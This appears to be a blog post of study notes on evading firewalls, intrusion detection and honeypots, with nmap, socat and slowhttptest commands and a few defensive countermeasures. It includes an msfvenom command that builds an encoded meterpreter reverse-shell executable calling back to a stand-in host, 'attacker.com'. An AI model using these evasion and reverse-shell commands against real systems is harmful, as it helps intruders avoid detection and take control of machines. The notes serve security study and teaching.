Evading IDS, Firewalls, and Honeypots Notes with Practical Examples

/ CyberSecurity / By

1. Introduction to Evasion Techniques

Evasion techniques are used to bypass security mechanisms like Intrusion Detection Systems (IDS), firewalls, and honeypots to carry out attacks without detection.

Key Objectives:

1. Avoid triggering alerts in IDS/IPS.
2. Bypass firewall restrictions.
3. Detect and evade honeypots to avoid traps.

2. Understanding Firewalls

Firewalls act as barriers between trusted and untrusted networks, filtering traffic based on rules.

Types of Firewalls:

  1. Packet-Filtering Firewalls – Inspect headers (IP, port, protocol).
    1. Example: Blocking all inbound traffic on port 22 (SSH).
  2. Stateful Inspection Firewalls – Track active connections (e.g., TCP handshake).
    1. Example: Allowing only established sessions.
  3. Application-Level (Proxy) Firewalls – Deep packet inspection (e.g., HTTP requests).
    1. Example: Blocking SQL injection in web traffic.
  4. Next-Gen Firewalls (NGFW) – Include IPS, DPI, and behavioral analysis.

Evasion Techniques:

  • Fragmentation Attacks – Split malicious payload into smaller packets to evade detection.
    • Tool: nmap -f (sends fragmented packets).
  • Port Redirection – Use allowed ports (e.g., 443 for HTTPS) to tunnel malicious traffic.
    • Tool: socat (redirect traffic from port 80 to 22).
  • Encrypted Tunnels (SSH/VPN) – Hide traffic inside encrypted channels.

3. Evading Intrusion Detection Systems (IDS)

IDS monitors network traffic for suspicious activity.

Evasion Methods:

  1. Protocol Manipulation
    1. Example: Using non-standard TCP flags (nmap –scanflags URGACKPSHRSTSYNFIN).
  2. Traffic Obfuscation
    1. Example: Encoding payloads in Base64 to avoid signature detection.
  3. Slow/Low Traffic Attacks
    1. Tool: slowhttptest (slow HTTP DoS attack).
  4. Polymorphic Code – Changing malware signatures dynamically.
    1. Tool: Metasploit’s msfvenom with encoders.

Practical Example:

# Bypass IDS with fragmented packets
nmap -f --mtu 16 -Pn target.com
# Use XOR encoding to evade signature-based detection
<!-- wp:paragraph -->
<p>msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker.com LPORT=443 -e x86/shikata_ga_nai -f exe &gt; payload.exe</p>
<!-- /wp:paragraph -->

4. Evading Honeypots

Honeypots mimic real systems to trap attackers.

Detection & Evasion Techniques:

  1. Network Behavior Analysis
    1. Example: Check for unrealistic responses (e.g., a “Windows XP” server in 2025).
  2. Port Scanning Anomalies
    1. Tool: nmap -sV –script=firewall-bypass (detect fake services).
  3. Time-Based Detection
    1. Example: Honeypots may respond instantly, unlike real systems.
  4. Virtual Machine Fingerprinting
    1. Tool: nmap –script=vmware-version (check for VM artifacts).

Practical Example:

# Check if a system is a honeypot
nmap -sT -p 1-1000 --script=http-title,ssh-hostkey target.com
# If all ports are open or responses are too generic, likely a honeypot.

5. Countermeasures Against Evasion

For Defenders:

  1. Deep Packet Inspection (DPI) – Analyze full payloads, not just headers.
  2. Anomaly-Based Detection – Use machine learning to detect unusual traffic.
  3. Honeypot Hardening – Make honeypots more realistic.
  4. Rate Limiting & Thresholds – Block excessive fragmented packets.

Example Defensive Rule (Suricata IDS):

# Drop fragmented packets
drop ip any any -> any any (ip_frag: yes; msg: "Fragmented packet detected"; sid:1000001;)

Conclusion

1. Firewalls can be bypassed using fragmentation, tunneling, and encryption.
2 IDS/IPS evasion involves obfuscation, slow attacks, and polymorphic code.
3. Honeypots can be detected via behavioral analysis and fingerprinting
4. Defenders must use advanced detection methods to mitigate evasion.

Final Tip:

Always test evasion techniques in a lab (e.g., Kali Linux + Metasploitable) before real-world use.

Tools Used:
1. Nmap (nmap -f, –script)
2. Metasploit (msfvenom)
3. Socat (Port Redirection)